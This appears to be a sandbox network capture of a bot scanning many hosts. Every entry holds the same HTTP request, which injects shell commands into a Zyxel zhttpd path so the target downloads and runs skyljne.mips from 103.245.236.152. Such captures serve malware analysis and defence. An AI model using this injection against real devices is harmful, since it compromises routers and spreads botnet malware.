                                          Jan 14, 2024 15:46:18.034773111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4705192.168.2.234661660.197.97.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034802914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4706192.168.2.234745493.241.210.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034852982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4707192.168.2.2335574129.94.177.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034888029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4708192.168.2.235752838.234.119.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034934998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4709192.168.2.234132449.6.192.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.034974098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4710192.168.2.235529643.123.69.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.035032988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4711192.168.2.235090268.65.235.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.035069942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4712192.168.2.235176666.200.154.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.035108089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4713192.168.2.2338364206.148.181.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.035191059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4714192.168.2.235488032.121.24.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.035216093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4715192.168.2.2359336162.148.141.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.035255909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4716192.168.2.2347000163.241.0.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.035300016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4717192.168.2.2356118221.229.194.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.035352945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4718192.168.2.2359922110.158.5.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.035377026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4719192.168.2.233878098.86.201.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.035408020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4720192.168.2.234034072.197.57.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.035461903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4721192.168.2.2349888160.131.24.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.035515070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4722192.168.2.2348256115.122.93.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.035543919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4723192.168.2.234308861.243.11.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.035592079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4724192.168.2.2333558136.163.23.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.035650015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4725192.168.2.235193677.103.23.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.035667896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4726192.168.2.2335304166.219.202.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.035712004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4727192.168.2.234184250.230.175.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.035742998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4728192.168.2.2353206163.88.135.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.035820961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4729192.168.2.235777425.187.254.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.035854101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4730192.168.2.2350258201.62.152.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.035917997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4731192.168.2.2359642213.7.214.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.035979986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4732192.168.2.234324298.224.81.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036009073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4733192.168.2.2352278206.177.217.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036036968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4734192.168.2.235864651.95.70.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036112070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4735192.168.2.235439899.143.26.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036137104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4736192.168.2.2352164211.91.160.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036180019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4737192.168.2.233597263.229.212.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036233902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4738192.168.2.2352220188.183.75.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036245108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4739192.168.2.2345830128.245.91.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036273956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4740192.168.2.2351994203.128.233.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036328077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4741192.168.2.235110831.148.15.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036359072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4742192.168.2.235262658.225.67.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036371946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4743192.168.2.2357458139.107.226.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036431074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4744192.168.2.233929079.183.227.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036468029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4745192.168.2.235680841.138.104.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036483049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4746192.168.2.2337580195.189.163.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036555052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4747192.168.2.2339398113.176.6.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036591053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4748192.168.2.233925658.250.207.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036650896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4749192.168.2.235460678.122.44.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036690950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4750192.168.2.2352390207.95.105.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036710978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4751192.168.2.2339994104.148.169.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036761999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4752192.168.2.2338808217.139.231.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036792040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4753192.168.2.23331565.196.83.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036856890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4754192.168.2.2348656144.221.60.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036899090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4755192.168.2.2343980113.222.251.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.036968946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4756192.168.2.2335356164.77.187.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037007093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4757192.168.2.234045088.159.178.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037048101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4758192.168.2.235878213.120.255.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037080050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4759192.168.2.2351068146.72.4.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037101984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4760192.168.2.233994896.28.127.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037143946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4761192.168.2.2338494138.157.156.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037193060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4762192.168.2.2339730207.45.89.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037215948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4763192.168.2.2337654213.198.75.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037293911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4764192.168.2.2357058190.27.214.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037327051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4765192.168.2.23453165.83.211.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037385941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4766192.168.2.2336678118.191.123.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.037426949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4767192.168.2.234888287.180.205.102443
                                          TimestampBytes transferredDirectionData
